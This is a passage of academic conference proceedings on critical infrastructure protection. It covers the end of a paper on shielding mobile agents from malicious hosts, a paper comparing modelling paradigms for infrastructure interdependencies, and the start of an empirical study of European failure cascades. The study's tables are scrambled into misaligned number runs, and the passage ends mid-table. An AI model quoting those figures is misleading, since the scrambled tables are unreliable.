malicious host can try to perform a loop process attack, that is, sending always the same ki to the sentinel. As ki is calculated taking into account the value of ki−1 , loop processes to confuse the sentinel are not possible because the one way function which takes part in ki calculation will never repeat the value so, in a natural loop processes, the agent will produce a new ki every time. In the same way, if the host try to perform a deny of service attack, this will be detected by the sentinel. Debugging or disassembly: This algorithm includes code verifications and integrity checks in order to identify if the mobile agent has been subjected to semanticspreserving transformation or even if a debugger is present. Moreover, the branch functions are the typical solution against static disassembly of native executables so the malicious host is not be able to perform this kind of attacks without to be detected by the sentinel. Break or stop agent execution: These actions can be detected with execution time control system. Exist a lot of proposal about this techniques as [7] or [8]. Mobile agent renovation: Renewing periodically the agent by another copy of the same agent but with another fingerprint can be extremely recommendable because the new agent will have new ki values which will be different from the old agent values. This action adds security to the system to prevent that the host can obtain enough information from the agent to perform a success attack to the system. This functionality has been taken into account in this proposal and it is easy by means of changing keyFM .
Protection of Mobile Agents Execution
293
4.2 Implementation Aspects In the proposed system, the mobile agent needs a periodically connection to the sentinel in order to continue with its normal operation. But this is not a problem in a critical infrastructures control because the intercommunication between the controlled system and the controlling systems is always necessary. Nevertheless, the amount of bytes that the systems interchange can be minimised with this proposal. Another aspect is the latency which is caused by the transmission time of requests and responses, from agent to sentinel and vice versa and the process time that is spent by the sentinel. Fortunately, the velocity of the critical infrastructures networks is the appropriate and this time can be considered negligible. Obviously, when the number of calls to MFBF increases, the execution time also increases. So a threshold must be defined in the design time by the security level required and the maximum delay which the monitored system can tolerate between the moment when the incident occurs and the moment when it is detected.
5 Conclusions A novel approach to guarantee the security of the mobile agents execution in a compromised host is presented. This approach is based in the algorithm presented by Myles et al. in [1]. This algorithm has, as well as authorship protection capacities, integrity code check, tamper detection and fingerprinting capacities. The original algorithm is based in branch functions that transfer the agent execution to the correct point in the program execution flow from a calculation obtained of one way function which depends on the authorship mark and the integrity check. Our improvement is the incorporation of an external element called sentinel which keeps the relation or mapping between the values obtained from the one way function (ki ) and the pointer to the next instruction in the program execution flow. The controlled host needs to send the value of the appropriate ki to the sentinel and waiting for the response to execute the agent in the correct way. On the other hand, the sentinel can control periodically the agent execution because it knows the correct sequence of ki for each agent. Additionally, a security analysis of the proposed schema is presented and some aspects related to its implementation are commented.
References 1. Myles, G., Jin, H.: Self-validating branch-based software watermarking. In: Barni, M., Herrera-Joancomart´ı, J., Katzenbeisser, S., P´erez-Gonz´alez, F. (eds.) IH 2005. LNCS, vol. 3727, pp. 342–356. Springer, Heidelberg (2005) 2. Franklin, S., Graesser, A.: Is it an agent,or just a program?: A taxonomy for autonomous agents. In: ECAI 1996: Proceedings of the Workshop on Intelligent Agents III,Agent Theories,Architectures,and Languages, London,UK, pp. 21–35. Springer, Heidelberg (1997) 3. Collberg, C., Thomborson, C.: On the limits of software watermark- ing. Technical Report 164, Department of Computer Science,The University of Auckland (August 1998) 4. Collberg, C., Thomborson, C.: Software watermarking: Models and dynamic embeddings (January 1999)
294
J. Tom`as-Buliart, M. Fern´andez, and M. Soriano
5. Wagner, N.R.: Fingerprinting. In: SP 1983: Proceedings of the 1983 IEEE Sympo- sium on Security and Privacy, Washington,DC,USA, p. 18. IEEE Computer Society, Los Alamitos (1983) 6. Linn, C., Debray, S.: Obfuscation of executable code to improve resis- tance to static disassembly. In: CCS 2003: Proceedings of the 10th ACM conference on Computer and communications security, pp. 290–299. ACM Press, New York (2003) 7. Hohl, F.: Time limited blackbox security: Protecting mobile agents from malicious hosts. In: Vigna, G. (ed.) Mobile Agents and Security. LNCS, vol. 1419, pp. 92–113. Springer, Heidelberg (1998) 8. Esparza, O., Soriano, M., Munoz, J.L., Forne, J.: A protocol for detecting ma- licious hosts based on limiting the execution time of mobile agents. In: Proceedings. Eighth IEEE International Symposium on Computers and Communication (ISCC 2003), vol. 1, pp. 251–256 (2003)
Adaptation of Modelling Paradigms to the CIs Interdependencies Problem Jose M. Sarriegi1, Finn Olav Sveen1 , Jose M. Torres1 , and Jose J. Gonzalez2 1
Tecnun, Paseo Manuel de Lardizabal 13 20018 Donostia - San Sebastian, Spain
[email protected],
[email protected],
[email protected] 2 University of Agder, Faculty of Engineering and Science, 4884 Grimstad, Norway Gjovik University College, NISlab, 2802 Gjovik, Norway
[email protected] Abstract. Research into critical infrastructure (CI) interdependencies is still immature. Such interdependencies have important consequences for crisis management. Owing to the complexity of this problem, computer modelling and simulation is perhaps the most efficient research approach. We present five facts that should be taken into account when modelling these interdependencies: 1) CIs are interdependent elements of a complex system. 2) Ever increasing interdependencies create new complexity. 3) Crises in CI are dynamically complex. 4) There is a need for a long term perspective. 5) Knowledge about CI is fragmented. These facts significantly condition the tools and methodologies to be used for modelling interdependencies, as well as the training and communication tools to transfer insights to crisis managers and policymakers. We analyze several modelling methodologies for applicability to CIs interdependencies problem.
1 Introduction The consequences of critical infrastructure (CI) failure can be considerable, even to the point where Society stops. CIs such as energy, transportation and Information and Communication Technologies (ICT) need to operate reliably and continuously 24 hours a day, 7 days a week. Serious crises can occur if CIs are disturbed. Relatively short interruptions may lead to serious long term consequences, which may also spread to other infrastructures. E.g., the modelling and simulation study by Conrad et al. [1] showed that the loss of energy infrastructure, even only for a relatively short time, is likely to cause deaths, e.g., as emergency services can not be reached when telephone services become disabled. Chang’s et al’s [2] analysis of the 1998 Canadian ice storm power outage showed similar effects. The loss of energy infrastructure led to oil supply problems because most electric pumps of gas stations were unable to pump fuel. Dorval airport lost its power supply and nearby ran out of. Railways were shut down because signals and switches were no longer working. The Atwater and Desbaillets reservoirs only had 4-6 hours of clean water left. Patients stayed longer in hospitals to avoid returning to blacked out homes, tying up beds needed for new patients. In addition, the distribution of medicines was slowed down as elevators were no longer operating. Natural disasters, accidents, criminals and terrorists threaten CIs. Traditionally they have been a direct threat to physical assets. However, Information and Communication R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 295–301, 2009. c Springer-Verlag Berlin Heidelberg 2009
296
J.M. Sarriegi et al.
Technology (ICT) is a new vector over which the impacts of these threats can propagate. The ”security culture” related to control systems has been shaped by their inception for isolated operation in innocent times of the past. It is a tradition of physical separation, tailor-made proprietary solutions and security-by-obscurity. In addition to the danger from external attacks, the threat from malicious insiders, possibly operating in tandem with outsiders, is considerable. Additionally, new technologies and evolving operational modes generate unfamiliar risks, which have ”emergent character”: they derive from interdependencies and circumstances that have not been anticipated by the designers and the users of CIs. I.e., they are risks that are shaped in novel ways by the different man-technologyorganization relationships [3]. Challenges in a CI crisis situation include not only technical, but also legal, economic and social issues. Business priorities, language and cultural differences may exacerbate crises. Multiple regulatory agencies and other unforeseen barriers may cause conflicting actions. When we lack experience we must turn to other methods to understand, predict and prepare for crises and their possible consequences. One way is through computer modelling and simulation. To achieve success the simulation environment must be able to realistically describe the strategic environment of a large crisis. Furthermore, crises involve transient, dynamic phenomena, which may have a significant impact on the unfolding of the crisis, and must be represented. In the first part of this paper, we identify five characteristics of the CIs’ interdependencies problem that have to be taken into account during its analysis. In the second part, we revise some representative simulation models that have been built using four different modelling paradigms to discover their benefits and limitations.
2 Characteristics of CIs Interdependencies Problem 2.1 CIs Are Interdependent Elements of a Complex System ”One of the most frequently identified shortfalls in knowledge related to enhancing CI protection capabilities is the incomplete understanding of interdependencies between infrastructures” [4]. Consequently, failing to understand these interdependencies and their dynamics will result in ineffective response and poor coordination between decision makers and agencies responsible for rescue, recovery and restoration [5]. As CIs are not isolated from one another, we need a ”system of systems” perspective to analyse them. Any one individual organization, concerned with its own problems, is likely to not have a complete understanding of how its actions affect other actors in the system. Hence, unexpected and unintended behaviour is likely to occur in CIs and dependent systems during crisis situations. Furthermore, owing to the last decade’s trend of deregulation, these CIs are no longer centrally controlled. As such, we are dealing with a large number of tightly coupled networks in which there is a multitude of agents with differing goals. Thus, it may be more appropriate to talk about a ”network of networks”. According to Rinaldi [6] there are four different types of CI interdependencies. The presence of any of the four types of interdependencies means that failure in one infrastructure will most likely propagate to other infrastructures:
Adaptation of Modelling Paradigms to the CIs Interdependencies Problem
297
1. Physical: If the state of each CI depends upon the material output(s) of other CIs. 2. Cyber: If a CI’s state depends on information transmitted through the ICT infrastructure. 3. Geographic: If local environmental changes affect all the CIs in that region, e.g., when the flooding of a reservoir knocks out a generator. This implies close spatial proximity. 4. Logical: If the state of each CI depends upon the state of another via policy, legal, regulatory or some kind of other mechanism. 2.2 Ever-Increasing Interdependencies Create New Complexity It is not only the incomplete understanding that is problematic, but also the emergent interdependencies owing to the fast growing rate of CIs interconnection. The likelihood of crises within CIs is on the rise, owing to the fast growth rate of interconnections seen in modern CIs [7]. The principal reason is the addition of numerous new sub-systems. The ever-increasing connections caused by these additions can potentially be exploited by hostile attackers, or the extra complexity created may cause accidental failures. The development of ICT has facilitated new and more effective business models. However, the new technologies and the evolving operational modes generate unfamiliar risks. The risks have ”emergent character”: they derive from interdependencies and circumstances that have not been anticipated by the designers and the users of CIs [3]. An example is the continuous and faithful performance of control systems, particularly of SCADA systems, which is crucial for CI. Most of these systems were designed during a past age of innocence when attacks were inconceivable and failures could be assumed to only have local consequences. These systems were designed for long life cycles (15 years or more) and for physically isolated operation, as proprietary systems, and - since they were ”hidden” elements for the outsider - in a tradition of securityby-obscurity. The hardening of SCADA systems’ security is an extremely costly and complicated endeavour requiring many years of reengineering. Recently, these systems have been connected to more open systems (i.e. the Internet) to improve their performance, but potentially reducing their security. 2.3 Crises in CI Are Dynamically Complex The stages of a cross-border crisis lifecycle may be asynchronous. For example: A crisis may occur in one country and later spread to another country through cascading effects. Thus, one country’s crisis is another country’s precursor to a crisis. In addition, the asynchronous stages of a crisis may occur out of phase with each other. Hence, the questions are what are the consequences of multiple out-of-phase crisis-lifecycles and how can we effectively dealt with them. Time delays in such crisis situations make it difficult to identify relations between causes and effects, and could lead to the implementation of solutions that only offer short term benefits. Delays also make it difficult to capture data, as it will only be available for short periods during the occurrence of crisis. Furthermore, the longer a crisis is expected to last, the more difficult it will be to acquire relevant data, as data collection systems may not be in place in those parts of the system where unexpected consequences show up.
298
J.M. Sarriegi et al.
2.4 There Is a Need for a Long Term Perspective Interdependencies between CIs mean that disruptions and failures in one CI may cascade to others [8], with the potential to cause extended outages. As a severe consequence, restoring service and recovering from disruptive effects is likely to take a long time. In contrast to familiar security crises, which are of short-duration and acute, CI crises - whether by failure or attack - could imply long-term, chronic disruption of vital operations. In a worst-case scenario, a successful attack on a CI might turn out to be a proof-ofconcept for attack weapons that could become widely available to the highest bidding criminal or terrorist groups. In addition, they could be used to unleash high consequence attacks against infrastructure in the energy or transport sector and other CIs of crucial importance for Society. The strategic aspects of crisis management have to include the whole lifecycle of crises [9]. Studies have shown that crises often have long incubation periods [10], [11]. Fink classified the crisis lifecycle in four stages [12], while Mitroff used five stages [13]. The three stages approach is the more common one. Coombs labelled the three stages as precrisis, crisis event and postcrisis [9]. This long term perspective demands a bird’s eye view in temporal, spatial and configuration space. ”Scenarios” have to be generalized to the strategic level, dealing with categories of disruptions and viewing crises as events with a long past, with numerous precursors and early warnings. A critical phase with characteristics shaped by the anterior events and which might last for considerable time, since the replacement of vulnerable CIs cannot be achieved in a matter of days, weeks and probably not even in months. As Coombs put it, ”a crisis does not just happen, it evolves” [9]. It can therefore be argued that effective crisis management starts well in advance of the actual physical manifestation of the crisis. Ideally, all crises could be avoided if perfect early warning systems were in place and we understood the interrelationships between CIs. With a lifecycle-view in mind, crisis management must encompass asynchronous management of the incubation periods, the physical manifestations of the crisis, the restoration periods and beyond. Hence, crisis management needs a long term approach, resolution of different perspectives and improvement of crisis communication, including developing an appropriate new crisis vocabulary and taxonomy. 2.5 Knowledge about CI Is Fragmented Since the exact nature of risk in interdependent CIs is not well understood, an effort is necessary to bring about greater understanding. This lack of understanding translates to a lack of written and numerical records. Consequently, knowledge about CIs interdependencies continues to be fragmented in the minds of different experts. Only when brought together in an environment that encourages interaction and exchange of information new knowledge about interdependencies in CI will be created. As we know, knowledge creation is inherently a social process [14]. Hence, we should launch activities oriented towards the interaction of the different agents that could have valuable pieces of knowledge. This must, by necessity, be multidisciplinary. CI security needs experienced technical staff who knows how CIs work, ICT experts, managers, lawyers, psychologists and anybody else who could provide valuable insights. If we leave anybody out, we will be vulnerable.
Adaptation of Modelling Paradigms to the CIs Interdependencies Problem
299
3 Adaptation of the Modelling Paradigms to the Characteristics of CIs Interdependencies Problem Over the years a variety of simulation paradigms have been developed and used to study strategic problems. Below we review some of these paradigms and attempt to judge their appropriateness for modelling interdependent CIs. Before we go on it is appropriate to think about the meaning of a model. A model is always a simplification of reality [15]. When we build models we do our best to include the most important aspects, but there will always be something that must be left out. If not, the model would be huge and unmanageable, and therefore lose its value as a tool that can help us make sense of a complex reality. Different paradigms make different omissions; hence no modelling paradigm is suited for every purpose. Network Models and Derivatives: These models are built on mathematical network theory. CI is represented as a network of vertices (nodes) interconnected by edges (links). These networks represent systems that have certain non-trivial topological features that do not occur in simple networks. The main contribution of traditional Network models consists in showing what the network would be if a node was added or removed. Although network analysis is very useful in building robust CI networks (or for attackers, in choosing the attack target), it is unable to represent the transition from non-crisis to crisis to end-of-crisis. They adopt a static perspective that does not include any dynamic element. Hence, they are not suitable for capturing neither dynamic complexity nor long term consequences. Nevertheless, they are very suitable for capturing and communicating the ”network of networks” perspective. Input-Output Models: I-O models build on the premise that output from one industry sector is input for one or more others and that there is equilibrium conditions between these. I-O models consider the structure of the economy and the flow of resources between the different sectors. The main weakness of I-O models is their ”data dependency”. Data, in addition to being scarce, are most often calibrated to annual data and intend to capture permanent changes and long term trends, smoothing out short term dynamics. Additionally, equilibrium conditions are implied in I-O models [16]. However, during a disruptive event there are no apparent reasons why the equilibrium, as it is normally defined in economics, should occur. I-O models, therefore, do not seem appropriate for modelling when the purpose is to understand the dynamics of the problem. However, I-O models may be appropriate if the goal is to see which sectors of the economy might be affected [17]. Agent-Based Models: Agent-Based modelling is a simulation methodology coming from the field of complexity science. A-B systems are comprised of multiple idiosyncratic agents. They represent complex system behaviour as consequences of local interactions between agents and their environment. To construct an A-B model it is necessary to specify three main types of elements: agents, rules and the environment. The agents are people or entities of the artificial societies. The environment is the framework or abstract space where the agents can interact, and the rules are behaviour patterns for the agents and the environment. These rules can take the relationship forms
300
J.M. Sarriegi et al.
of agent-environment, environment-environment and agent-agent. An insight of A-B models is that complex behaviour can arise from quite simple rules. Behaviour is said to be emergent, i.e. it arises endogenously. The main benefits of using A-B models are the possibility of representing heterogeneous agents, capturing emerging behaviour and creating a space where the agents interact according to distance [18]. Hence, A-B models are especially suitable when the interactions among agents are complex; nonlinear, discontinuous or discrete, when the population is heterogeneous or each individual is potentially different; when their geographical localization is key to the problem; or when the agents exhibit complex behaviours such as learning or adaptation. However, the implementation of A-B models embeds the agent rules into programming code, which makes more difficult its communication to people without modelling expertise. System Dynamics Models: System Dynamics (SD) has been heavily shaped by the Human Sciences and is used to study complex social systems. Its record proves that SD is appropriate to study any kind of complex, non-linear dynamic system, even pure technological systems. But one of its main advantages is its ability to effectively model sociotechnical systems, which consist of human, organizational and technological parts. The philosophical stance behind SD models is that complex systems are in essence feedback systems. That is, closed-loop relationships are ubiquitous in those systems: X affects Y, which in turn, directly or indirectly, affects X. SD is used when the individual properties are not decisive and high-level aggregation is desired or required for management purposes. SD encourages not focusing on the isolated events but rather on the behaviour pattern that these events lead to. This high aggregation level makes it easier to analyse crisis as evolutionary processes that could last long periods of time. Additionally, in SD models, the system’s feedback structure is explicitly represented, which gives them an advantage with respect to visual representation. Another strength of SD is that it has developed collaborative modelling methodologies where modellers work jointly with experts on the problem. This participation of the beneficiaries of the model since the early stages of its development also increases their confidence and acceptance. These collaborative methodologies are encompassed under the name ”Group Model Building” [19]. We can conclude that significant improvements can be made in the CIs interdependencies problem using modelling and simulation techniques, especially if we are aware of the potential and weaknesses of the different modelling paradigms. Thus, identifying the main characteristics of the problem we want to analyse, and adopting the most suitable modelling technique will enable us to yield the best results.
References 1. Conrad, S.H., LeClaire, R.J., O’Reilly, G.P., Uzunalioglu, H.: Critical National Infrastructure Reliability Modeling and Analysis. Bell Labs Technical Journal 11(3), 57–71 (2006) 2. Chang, S.E., McDaniels, T.L., Mikawoz, J., Peterson, K.: Infrastructure failure interdependencies in extreme events: power outage consequences in the 1998 Ice Storm. Natural Disasters 41, 337–358 (2007) 3. Schneier, B.: Secrets & Lies: Digital Security in a Networked World. Wiley, New York (2000)
Adaptation of Modelling Paradigms to the CIs Interdependencies Problem
301
4. Mussington, D.: Concepts for Enhancing Critical Infrastructure Protection Relating Y2K to CIP Research and Development: RAND’s Science and Technology Policy Institute (2002) 5. Pederson, P., Dudenhoeffer, D., Hartley, S., Permann, M.: Critical Infrastructure Interdependency Modeling: A Survey of U.S. and International Research. Idaho Falls, Idaho: Idaho National Laboratory Critical Infrastructure Protection Division (2006) 6. Rinaldi, S.M.: Modeling and Simulating Critical Infrastructures and Their Interdependencies. In: Proceedings of the 37th Hawaii International Conference on System Sciences, Hawaii (2004) 7. Bologna, S., Di Costanzo, G., Luiijf, E., Setola, R.: An Overview of R&D Activities in Europe on Critical Information Infrastructure Protection (CIIP). In: L´opez, J. (ed.) CRITIS 2006. LNCS, vol. 4347, pp. 91–102. Springer, Heidelberg (2006) 8. Beyeler, W.E., Conrad, S.H., Corbet, T.F., O’Reilly, G.P., Picklesimer, D.: Inter-Infrastructure Modeling-Ports and Telecommunications. Bell Labs Technical Journal 9(2), 91–105 (2004) 9. Coombs, W.T.: Ongoing Crisis Communication: Planning, Managing and Responding, 2nd edn. Sage, Los Angeles (2007) 10. Turner, B.: The Organizational and Inter-organizational Development of Disasters. Administrative Science Quarterly 21(3), 378–397 (1976) 11. Vaughan, D.: Autonomy, Interdependence and Social Control: NASA and the Space Shuttle Challenger. Administrative Science Quarterly 35(2), 225–257 (1990) 12. Fink, S.: Crisis Management: Planning for the inevitable. AMACOM, New York (1986) 13. Mitroff, I.I.: Crisis Management and Environmentalism: A Natural Fit. California Management Review 32(2), 101–113 (1994) 14. Nonaka, I., Takeuchi, H.: The Knowledge-Creating Company. Oxford University Press, New York (1995) 15. Sterman, J.D.: Business Dynamics: Systems Thinking and Modeling for a Complex World. Irwin/McGraw-Hill, Boston (2000) 16. Dauelsberg, L., Outkin, A.: Modeling Economic Impacts to Critical Infrastructures in a System Dynamics Framework. In: The 23rd International Conference of the System Dynamics Society, Boston (2005) 17. Kujawski, E.: Multi-Period Model for Disruptive Events in Interdependent Systems. Systems Engineering 9(4) (2006) 18. Borshchev, A., Filippov, A.: From System Dynamics and Discrete Event to Practical Agent Based Modeling: Reasons, Techniques, Tools. In: The 22nd International Conference of the System Dynamics Society, Oxford, UK (2004) 19. Andersen, D., Richardson, G.P., Vennix, J.M.: Group Model Building: adding more science to the craft. System Dynamics Review 13(2), 187–201 (1997)
Empirical Findings on Critical Infrastructure Dependencies in Europe Eric Luiijf1 , Albert Nieuwenhuijs1, Marieke Klaver1 , Michel van Eeten2 , and Edite Cruz2 1
TNO Defence, Security and Safety, Oude Waalsdorperweg 63, 2597AK The Hague, The Netherlands {eric.luiijf,albert.nieuwenhuis,marieke.klaver}@tno.nl www.tno.nl 2 Faculty of Technology, Policy and Management Technical University of Delft, PO Box 5015, 2600 GA Delft, The Netherlands
[email protected] Abstract. One type of threat consistently identified as a key challenge for Critical Infrastructure Protection (CIP) is that of cascading effects caused by dependencies and interdependencies across different critical infrastructures (CI) and their services. This paper draws on a hitherto untapped data source on infrastructure dependencies: a daily maintained database containing over 2375 serious incidents in different CI all over the world as reported by news media. In this paper we analyse this data to discover patterns in CI failures in Europe like cascades, dependencies, and interdependencies. Some analysis results indicate that less sectors than many dependency models suggest drive cascading outages and that cascading effects due to interdependencies are hardly reported.
1 Introduction Most nations and the European Union [1] have identified that critical infrastructures (CI) dependencies are causes of major concern. A failure within a single CI may already be damaging enough to society. However, when such a failure cascades across CI boundaries, then the potential for multi-infrastructural collapse and high catastrophic damages may be high. Various modelling and simulation efforts also stress the possibility of dependencies and cascading failure. But just how to rate this type of risk in comparison to other risk factors for CI, remains unclear. While probabilities are unknown, the magnitude of the consequences multi-sector collapse is so large that many argue that this factor alone pushes this risk to the top of national priority lists. Auerswald [2] calls CI dependencies the ’unmanaged challenge’, which has proven to be less tractable than managing the vulnerabilities within a single CI: More pervasive and difficult to manage are the (inter)dependencies that exist among firms in different infrastructures. Most national CI protection (CIP) policies identify dependencies as a priority area. Adequately addressing this unmanaged challenge will draw substantial resources away from other CIP areas. The question is whether the risk associated with CI dependencies, and if so, for which set of CI, needs to be prioritised. A confrontation with empirical data, even if scarce or incomplete, may help in decision-taking and prioritising. So far, such efforts - as far as the authors know - are by and large missing. R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 302–310, 2009. c Springer-Verlag Berlin Heidelberg 2009
Empirical Findings on Critical Infrastructure Dependencies in Europe
303
This paper draws on a hitherto untapped data source on CI dependencies: a database containing recordings of 2517 CI failures (as of July 30, 2008) and their cascading outages. The authors analyse this data to discover patterns in CI failures across different CI in the world, in Europe, and in the Netherlands. The outline of this paper is as follows: in Section 2 we review the state of the art of current research on CI dependencies. Section 3 shortly discusses the scope, method and limitations of our analysis. In Section 4, we present our data analysis findings for Europe. Section 5 contains the conclusions and the implications of our analysis.
2 Dependencies - State of the Art Most CI dependency literature use a theoretical modelling approach to dependencies, e.g., Rinaldi et al, [4] and Svendsen and Wolthuysen [6]. Most post mortem analysis reports about CI disruption incidents describe the incident from a single CI view, e.g., [9]. Cascading effects and dependency consequences are often hidden in government reports about their emergency response efforts to disasters, e.g., Von Kirchbach [8]. Other research focuses on the modelling and simulation of CI and cross-links between different CI sectors [3]. Generally spoken, these models are not based on real life data or on a full dependency analysis of past incidents. The empirical work in this paper discusses observations made on CI dependencies based on news and other reports about serious CI events. There exist, however, databases which focus on collecting empirical data of infrastructure incidents. Without exception, however, these databases focus on a specific environment, a single CI sector, or a specific type of risk. Examples of foci of such databases are for instance terrorism-caused energy infrastructure disruptions, process industry safety, electric power disturbances (e.g., national or European grid disturbance reports), radiological incidents, and aircraft incidents (e.g., [5,7,10]). No databases have been found which focus on serious disturbances of all CI and the cascading effects using an ’all-hazards’ approach.
3 Method At the core of our analysis is a database with public reports of CI disruptions, collected from open sources like newspapers and internet news outlets. If possible, the data is augmented by official incident reports. An event in one of the CI sectors will be added to the database if there is a serious impact: only events are recorded which had a noticeable effect to society, e.g., at least 10.000 affected electric power customers. Daily occurring local and scheduled operational disturbances are excluded. For each event we record, e.g., affected CI sector and service, initiating event, the concerned organisation(s), start and end times/dates, country, affected geographic area and its size, description of the cause, threat category and subcategory, consequences/damages and impact, recovery process, and references. While data has been collected on a variety of countries in the world, for the purposes of this paper we focus on a subset: 1749 CI failure incidents in 29 European nations (95% of them occurred after 2000). Based on this
304
E. Luiijf et al.
subset, we empirically study CI (inter)dependencies. A CI dependency is the relationship between two CI products or services in which one product or service is required for the generation of the other product or service; a CI interdependency is a mutual CI dependency. We understand that the data set and approach has limitations. We explored the validity of the findings by triangulating the Dutch national data with outage data from a Dutch CI operator. We also found self-similarities in the Dutch, EU and US subsets of the event database. However, we realise that the data is biased by the limited set of European languages (Dutch, English, French, German, Portuguese, and Spanish) which we use to identify and extract media reports. Another bias may be the reporting practices of news media as not every serious CI incident is reported by news media. Among other factors, the news reports likely reflect what the news outlets assume is of interest to their audience. It is not clear if and how our findings are affected by these limitations. We are not aware of any research that has studied biases in how the media report on CI failures. That said, we believe that in light of the overall paucity of empirical research on this topic our analysis contributes much needed data to the policy debates on CIP and the risk of CI cascading failure. In our analysis, we will classify events in cascade initiating events, cascade resulting events and independent events. A cascade initiating event is an event that causes an event in another CI or CI service; a cascade resulting event is an event that results from an event in another CI or CI service, and an independent event is an event that is neither a cascade initiating event, nor a cascade resulting event. These categories are not mutually exclusive. Because an event can be both caused by an event outside a CI sector and propagate as another event outside the CI sector, some events are both a cascade initiating and a resulting event. This may cause the sum of initiating, resulting and independent events to exceed the total number of events (e.g., the ”Total column” in Table 1). The analysis below is performed at the level of CI services. This means that we only consider a cascading resulting event to be a dependency -and include it into the resultsif the event takes place in another CI service than the one of the cascade initiating event. For readability, most results below are aggregated to the CI sector level. Consequently, dependencies between underlying services within a CI sector appear as occuring within a single CI sector.
4 CI Dependencies in Europe 4.1 Number of Cascades We have first analysed the data by distinguishing cascading events from non-cascading events (Table 1). Interestingly, 29% of the reported incidents in Europe result from incidents in other services (501 of the 1749 events). Anecdotal evidence about dependencies and cascading sometimes conveys the sense of reporting on rather unlikely scenarios, suggesting that cascades are events of low probability and high consequence. Our data, however, shows that they are significant more frequent.
Empirical Findings on Critical Infrastructure Dependencies in Europe
305
Table 1. Categorisation of number of CI disruption events (number of events)
CI Sector
Cascade Cascade Sample Independent Total initiating resulting size
Education Energy Financial Services Food Government Health Industry Internet Postal Services Telecom Transport Water Total
0 146 1 0 2 1 5 15 1 69 19 9 268
3 76 26 4 40 16 15 51 0 125 128 18 501
1 388 33 3 26 22 7 95 0 114 276 51 1017
4 609 60 8 68 39 27 161 1 308 423 78 1786
4 590 60 8 67 39 27 160 1 295 422 76 1749
4.2 Directionality of Cascades Next, we established in which CI sector an event originates and which CI sectors are affected (Table 2). The events that are not cascade-related are labelled no sector”. They comprise disruptions due to a large range of external events (e.g., weather, deliberate human actions, and economical factors) and internal failures (e.g., human error, technical failure). Table 2 shows that the energy and telecommunication sectors are the main cascading initiating sectors. Energy is the only sector which initiates more cascades than it ends up receiving. When disregarding not cascade initiated events, the empirical data confirms that the dependency matrix is sparsely populated and that cascades are highly asymmetrical. The energy and telecommunication sectors cause outages in other sectors (60% and 24% respectively), but not many other CI sectors cause outages in energy, telecommunication and internet (Table 2). The affected energy, telecommunication and internet sector event percentages of 15%, 25% and 10%, respectively, are for a large part generated by services within these three sectors. In short, the dependencies are very focused and directional. In fact, one may want to stop talking about inter-dependencies, as this suggests a reciprocal relationship that the data simply does not warrant as occurring frequently. Actually, only two weak European interdependencies are recorded. This raises an important issue: does this mean that, while dependencies and interdependencies are everywhere, at least theoretically, they are rarely strong enough to trigger a secondary outage which is reported by the news media? Do they only occur after a longer period of disruption than is often the case? Or are these cascading outage events so hidden in the chaos caused by the primary CI outage and its effects that the press does not report on them? The dependency of many sectors on energy and telecommunications has been reported widely. The Table 3 data suggests that the CI dependency on energy is substantially higher (taken mitigation measures into account) as 60% of all cascades originate within the energy sector, 28% in the telecommunication and internet sectors, and 5% in the transport sector, 3% in the water sector, and 4% in the remaining CI.
306
E. Luiijf et al. Table 2. Events categorised by initiating sector and affected sector (# of events)
Education Energy Financial Services Food Government Health Industry Internet Postal Services Telecom Transport Water Total
1 515 34 4 27 23 12 109 1 170 294 58 1248
1 65 4 5 3 3 3 17 1 1 1 4 11 2 12 1 14 10 62 98 14 302
Grand Total
Water
Telecom Transport
Internet Postal
Energy Financial Services Government Health Industry
CI Sector
No sector
Initiating sector
2 4 3 589 60 8 1 67 1 39 1 27 160 1 1 57 5 295 1 3 1 5 15 5 422 2 2 76 3 2 3 11 18 1 122 24 15 1749 2 1 15 1 14 1 2 1 27
4.3 Energy and Telecom Sector Services A good practice is to strictly separate the office automation and the SCADA environments and to have a strictly controlled data exchange between these environments, if required at all. The Energy sector column in Table 2 shows that the energy sector is an important cascade initiating sector for almost all sectors. The second largest is the telecommunication sector. When we consider the energy sector services in Europe, it can be concluded that the initiating events for a large majority originate within the electrical power service (see Table 3). It can be deducted that serious disruptions of electric power has affected almost all CI sectors and services. When considering also cascading between CI services within a CI sector, 61 dependencies exist between the electrical power sector services generation, transmission and distribution. Only in four cases the oil and gas subsectors were affected. The telecommunication services fall apart in the backbone networks and their services, cable/CATV services, the fixed telecommunication infrastructure (e.g., POTS, DSL, leased line and alarm line services), and mobile telephony (incl. SMS). As the telecom sector column in Table 2 indicates, this sector is an important initiator for events in the financial services, the government services, and the internet and telecom sectors themselves. Due to the sector structure, disruptions of telecom backbones more seriously affect internet services than other telecom services. In the same way, the loss of cable/CATV services affects internet access and voice services.
Empirical Findings on Critical Infrastructure Dependencies in Europe
307
Table 3. Cascade initiated events categorised by affected sector (percentage of events contributed to an affected sector)
Education Energy Financial Services Food Government Health Industry Internet Postal Services Telecom Transport Water Total # of events
0% 22% 36% 2 100% 17% 1% 6% 50% 33% 9% 22% 4% 67% 4% 9% 5% 56%
2% 12% 11% 2% 22%
21% 6% 47% 32% 50% 27% 100% 4% 5% 18% 100% 100% 100% 100% 100% 100% 100% 100% 203 3 2 3 11 18 1 122
Grand Total
Water
Transport
Telecom
Postal
Internet
Industry
Health
Government
Financial Services
CI Sector
Energy
Initiating sector
13% 0% 4% 20% 15% 5% 4% 1% 4% 7% 8% 7% 3% 7% 3% 10% 0% 21% 25% 83% 33% 26% 13% 4% 100% 100% 100% 24 15 501
Detailed analysis of the database shows that the financial sector only seems to be affected by disruptions in the fixed telecommunications infrastructure in the functioning of automated teller machines and electronic payment systems. GSM/UMTS, emergency response and 1-1-2 services are affected by fixed telecom failures. 4.4 Escalation of Cascades The domino theory suggests that serious CI failures result in a sequence of disruptions in other CI. Table 5, however, shows that on average a cascade initiating event in the energy sector triggers 2,06 disruptions in other CI services. A cascade initiating event in the telecommunication sector on average triggers 1,86 disruptions in other CI services. Considering all events (including all independent events), Table 5 also shows that one out of two events in the energy sector triggers a disruption in another CI and just above two out of five events in the telecommunication sector triggers another disruption. Analysis also shows that 421 events or 24% of the 1749 events, are a first level of cascade event, 76 events (4%) are the result of a second cascade, and 4 events are caused by a third cascade. No deeper cascades have been found, neither in Europe, nor internationally.
308
E. Luiijf et al.
Table 4. Cascade initiated events categorised by CI sector service (percentage of events contributed to an affected sector) )
Education Energy Financial Services Food Government Health Industry Internet Postal Services Telecom Transport Water Total # of events
# events Telecom
SMS
